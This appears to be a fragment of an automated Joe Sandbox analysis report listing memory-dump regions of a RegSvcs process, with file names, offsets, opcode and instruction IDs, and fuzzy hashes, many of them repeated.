                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40ef7fcd8c54b971fe7aef79656d103f0e045d35b22f68d634e8ee33968a6160
                                                        • Instruction ID: df844c854604528c1a23595d44abf87cdf4ee0d9fbddd85bccc09295e6af6ebd
                                                        • Opcode Fuzzy Hash: 40ef7fcd8c54b971fe7aef79656d103f0e045d35b22f68d634e8ee33968a6160
                                                        • Instruction Fuzzy Hash: 29C08C6278180007C388C208FCB33E3B3C68BC8224F18C06BA40CC7B85EA23CC038AC8
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 77ee6b405c0fea9480a782e4a5b0f8e18539ab5389409d0740e6584e607ad994
                                                        • Instruction ID: 7953eba3c14617bfc36d1f002aff534591c4e6bdc25b4cbb2c03bc3d83f802df
                                                        • Opcode Fuzzy Hash: 77ee6b405c0fea9480a782e4a5b0f8e18539ab5389409d0740e6584e607ad994
                                                        • Instruction Fuzzy Hash: D0D0A9A055E1801FC302C3308DA7841BFA19E8220071CC4DE9888CB2A3DA29980B8321
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 791868b2b6d4904eca63423b42afb3773cf3bd7afed7f015f908fe64dc81cf6d
                                                        • Instruction ID: 1d2c5b51030abd186a83bee4b09449a282c16bbf154cb9b97365610c327b5c4c
                                                        • Opcode Fuzzy Hash: 791868b2b6d4904eca63423b42afb3773cf3bd7afed7f015f908fe64dc81cf6d
                                                        • Instruction Fuzzy Hash: B8D0C9712081219F9244CA48E950C6BB7E9DBC9A10B14884EB88493241CA62DC16CBB2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b788f614386f89c58e6272eb79b92af1259d640a7623d91d8148e5da1d520ef
                                                        • Instruction ID: 0aacfb4f1fd1132d2bdbcf430449212eaac969debe6b078adacb699940b24184
                                                        • Opcode Fuzzy Hash: 8b788f614386f89c58e6272eb79b92af1259d640a7623d91d8148e5da1d520ef
                                                        • Instruction Fuzzy Hash: 48D022712111009BC284C204C406F82FB50EB44200FA4C018C48187350C73288038F48
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3fb060224f1340382df307225fc2c26fd49cff0e5d91fdcd934f49dc06c60ae4
                                                        • Instruction ID: 2e5bd547d505b636f5467f31cff19ca720c9daca2f99e4e4f65001f839751d53
                                                        • Opcode Fuzzy Hash: 3fb060224f1340382df307225fc2c26fd49cff0e5d91fdcd934f49dc06c60ae4
                                                        • Instruction Fuzzy Hash: 20D0C761A2D3C00BD3438B2088AB695BFB09F57114B2980DAD4849F257D6359D0BC318
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bcbb9d0724d100c1875ad0b45158de89f1c2eb3c277dba2d5ae002b33063b32b
                                                        • Instruction ID: e9d371cdbcc9e631b9503575eb2fa729b510e246e87c12f93986d815b67f4174
                                                        • Opcode Fuzzy Hash: bcbb9d0724d100c1875ad0b45158de89f1c2eb3c277dba2d5ae002b33063b32b
                                                        • Instruction Fuzzy Hash: 75D05E2550E2C00BD30287648C66462FFA1CF9321471984DBC8859F197D5259C2BC765
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                        • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                        • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                        • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80c10b9f176c3c3f01e0f5b32623b0a55484d8ec650bbca9ef6fea36099094f0
                                                        • Instruction ID: fe64cb36505b780031039173714807b7389b3a6daba839475bf02e98e5e6a31f
                                                        • Opcode Fuzzy Hash: 80c10b9f176c3c3f01e0f5b32623b0a55484d8ec650bbca9ef6fea36099094f0
                                                        • Instruction Fuzzy Hash: EFD012723002415BE344C618CC8AB5BFBE5DBD5210F28C06DA448CB351EB71EC02C711
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                        • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                        • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                        • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                        • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                        • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                        • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                        • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                        • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                        • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8cb1cc24ea7b4c9e9e86ec8c1016386df7e65555c252a5a7d38d5de0bc3e4af6
                                                        • Instruction ID: 2699f1df17e5286173fb9167c457aad79280ea6d0c941e53c755a19a50f95ede
                                                        • Opcode Fuzzy Hash: 8cb1cc24ea7b4c9e9e86ec8c1016386df7e65555c252a5a7d38d5de0bc3e4af6
                                                        • Instruction Fuzzy Hash: B0D0C97120A2805BC386CA68C859856BFB1AFC6218F18C09FE88CCB253DA72DC06D721
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                        • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                        • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                        • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                                                        • Instruction ID: bcf9ef9c82f7d3924de405cb1b01dc34d2668a849c410a3a4cb9bba8efa29a2e
                                                        • Opcode Fuzzy Hash: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                                                        • Instruction Fuzzy Hash: 91C012712082605F8244DA48C850C67F7E9AFCD110718C84FB494C3341CA61DC07C7A0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e3edafbca9a31116953b62584d2053bcf40598ad2e0c98ee887ec77e709aa8df
                                                        • Instruction ID: 2de50a757cfc71534d1b564a84c84875a906e65c1ac15bd999fb4e788f51ba6e
                                                        • Opcode Fuzzy Hash: e3edafbca9a31116953b62584d2053bcf40598ad2e0c98ee887ec77e709aa8df
                                                        • Instruction Fuzzy Hash: 70C04C500491C65FD70663B488F38F5BF74ADC751430A81C9D4D44F1D3CA055677D364
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f23d376ebc9f2f2f74d93c5f8f919a9c7d3f13b8e79c578541869c0d8beedc4
                                                        • Instruction ID: 3dffc6c02b748009ada9257d30d444e0c78826c56085ac6cb83452d710359bb4
                                                        • Opcode Fuzzy Hash: 9f23d376ebc9f2f2f74d93c5f8f919a9c7d3f13b8e79c578541869c0d8beedc4
                                                        • Instruction Fuzzy Hash: 1BD0C9742042405BC345CB18C980A11BB96EB9D218F38C458E44AC3311DA31D843C700
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6815651479b0594dcaa0d9f8995ef44892868ab05b8f63e828fe550928c12798
                                                        • Instruction ID: bec4bbd4a8d0f9ee732508b894346fb03d3471ff2a193e27385081aa9f5a10c5
                                                        • Opcode Fuzzy Hash: 6815651479b0594dcaa0d9f8995ef44892868ab05b8f63e828fe550928c12798
                                                        • Instruction Fuzzy Hash: A6D0C9342051406FE305C728C946A52BBD2EB89208F64D468A5CA87316EA22AC03C700
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                                                        • Instruction ID: bcf9ef9c82f7d3924de405cb1b01dc34d2668a849c410a3a4cb9bba8efa29a2e
                                                        • Opcode Fuzzy Hash: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                                                        • Instruction Fuzzy Hash: 91C012712082605F8244DA48C850C67F7E9AFCD110718C84FB494C3341CA61DC07C7A0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: efec1d24bffefc7ad8d8803551c7f66961e48bcf21c8fd5179e9b868e6337dd4
                                                        • Instruction ID: ef6908470ce7a9b4adc18513f5e5ea95157daa71298f8d4e0ff681c50b07f8cb
                                                        • Opcode Fuzzy Hash: efec1d24bffefc7ad8d8803551c7f66961e48bcf21c8fd5179e9b868e6337dd4
                                                        • Instruction Fuzzy Hash: 3FD0122400A341CFC7018F19C413088BB70EF4731930680E6CCC08E152CB255947D301
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c08ef39add51bf6b32406a62576eee01b105cee69bd9ea16b8806f885fbb890a
                                                        • Instruction ID: 2a5407cf51738fd35bf186d7c86cd924169a159763436dbacc9787c0c2146040
                                                        • Opcode Fuzzy Hash: c08ef39add51bf6b32406a62576eee01b105cee69bd9ea16b8806f885fbb890a
                                                        • Instruction Fuzzy Hash: F5C08C617481800FC749D628CC55684BBB3AFDA124318C0E9480ACB356EE2BDC0B8B00
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                        • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                        • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                        • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e3bec9eed2e99d6c09d8a218395e5a7b77b003e62662b96cf7cf3385d9ef5904
                                                        • Instruction ID: 6c7eec61fb0f93a6f827b88bdc898f1636d5b18702b5e39beea8c485fce9481c
                                                        • Opcode Fuzzy Hash: e3bec9eed2e99d6c09d8a218395e5a7b77b003e62662b96cf7cf3385d9ef5904
                                                        • Instruction Fuzzy Hash: DDC09B7760441057D345C508EC9374467D5D7D8326F68D05DD414CB345CF27D5434550
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 898aff0cd7ef4af506d2287fe7b94a6ace081f720883fa8af2bc7356b8068b6f
                                                        • Instruction ID: efa6f1fd2a728daab6e368be1cea9cd7deeee5343bf21ed53909f138b3f328f9
                                                        • Opcode Fuzzy Hash: 898aff0cd7ef4af506d2287fe7b94a6ace081f720883fa8af2bc7356b8068b6f
                                                        • Instruction Fuzzy Hash: 5AC04C7214510057F7488924D952785E791DB85324F38845DD814CB295CE2AD6435998
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                        • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                        • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                        • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                        • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                        • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                        • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2342f706ee7e609096b276598d973da865f9c8978b7431d5c0f347a3f55c80f5
                                                        • Instruction ID: c3695f3c9df6b67f1d8cbe57cf021a42581fb30e9cc86c88dba749d3905fe4b3
                                                        • Opcode Fuzzy Hash: 2342f706ee7e609096b276598d973da865f9c8978b7431d5c0f347a3f55c80f5
                                                        • Instruction Fuzzy Hash: A5C0122510D1D00FC342C768D8A5494BFA09E4211472CC4DFD848CB153CB11D806C361
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                        • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                        • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                        • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                        • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                        • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                        • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5191b0a9850a1dec85605333903079bf4265ae667eac14b3d23531a86f5a7724
                                                        • Instruction ID: 997885d6e5e785adff0bf4836f9eff2e6356ca96e01c8edb912fd4d6a89909b3
                                                        • Opcode Fuzzy Hash: 5191b0a9850a1dec85605333903079bf4265ae667eac14b3d23531a86f5a7724
                                                        • Instruction Fuzzy Hash: 46D012362051008BD305CA18D8A1B82FBA1AB95321F68C4AED484873A2CF35DC47D705
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a311025aa6d82cb5dadbfa8d5bd39fa3fefff6c675915e7ab82bc3cc74a6076
                                                        • Instruction ID: 1f7aecb84f483f08f2418b158e8a83ff7b8c6ddf0ed4738f41e69bce695d1584
                                                        • Opcode Fuzzy Hash: 0a311025aa6d82cb5dadbfa8d5bd39fa3fefff6c675915e7ab82bc3cc74a6076
                                                        • Instruction Fuzzy Hash: 38C08C363001006F8208DA08C8A2917F7E1EBD8330724C02DA40EC7354DE32EC03C680
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 666e22699145f64bc60a4e447feb997684081377115158e007d5593e6486e725
                                                        • Instruction ID: fc3b16cf645d71b2709d865a9dad2c9ea587e6feec2a4884f29a7c9dd8dc4185
                                                        • Opcode Fuzzy Hash: 666e22699145f64bc60a4e447feb997684081377115158e007d5593e6486e725
                                                        • Instruction Fuzzy Hash: 45D0122010E2C00FC7839B64C8B2850BF72CE8B10835DC0DE9088CF267CA2B980BEB45
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 771f4daaec54c6ec072ab25253e9596a27bb46fcecb359dc21adea9f8e93204a
                                                        • Instruction ID: fdfc7207f78affe558e09f03b963fb2e3d71c24df916173c1cb50516c8cd9788
                                                        • Opcode Fuzzy Hash: 771f4daaec54c6ec072ab25253e9596a27bb46fcecb359dc21adea9f8e93204a
                                                        • Instruction Fuzzy Hash: 75C0127010E3504FC345C718DD55595BB649E45215318C4DA9404CB257CB37C8038B95
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 69bb522adc92267eebe42aaa0390e13edf087a3da57a7d5918a69bca4bac71f9
                                                        • Instruction ID: 2a9d1d059bd9b4a8470e33493354136a3f24986135f557cd5fd8674f8946ccf0
                                                        • Opcode Fuzzy Hash: 69bb522adc92267eebe42aaa0390e13edf087a3da57a7d5918a69bca4bac71f9
                                                        • Instruction Fuzzy Hash: 5DC04C725151004BC7E4850CD8977D77391D785325F68C859D404DFAA5DA22D4434585
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 056d90c0d7aa72b83da33ec32cb7dc9d694542fbcbcf0de0d921823c0756c049
                                                        • Instruction ID: 7d45e9bcdee0754393eaff71c2b1c27c514213e27e882a76f48ab4c7ed3b9f37
                                                        • Opcode Fuzzy Hash: 056d90c0d7aa72b83da33ec32cb7dc9d694542fbcbcf0de0d921823c0756c049
                                                        • Instruction Fuzzy Hash: 41C04C72A150004BC3D89558D9977D573A1EB85315F18C55AD408CBB56EB23D94389C9
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                        • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                        • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                        • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 702dbf903fa6bfb03e1aa3f1098ecccd3f244557d9b9a41df3bf4f61130a765d
                                                        • Instruction ID: fc33a31c9a588d2f3db82b0566503372e2862d9333ed5b184e4c823c5999c8ee
                                                        • Opcode Fuzzy Hash: 702dbf903fa6bfb03e1aa3f1098ecccd3f244557d9b9a41df3bf4f61130a765d
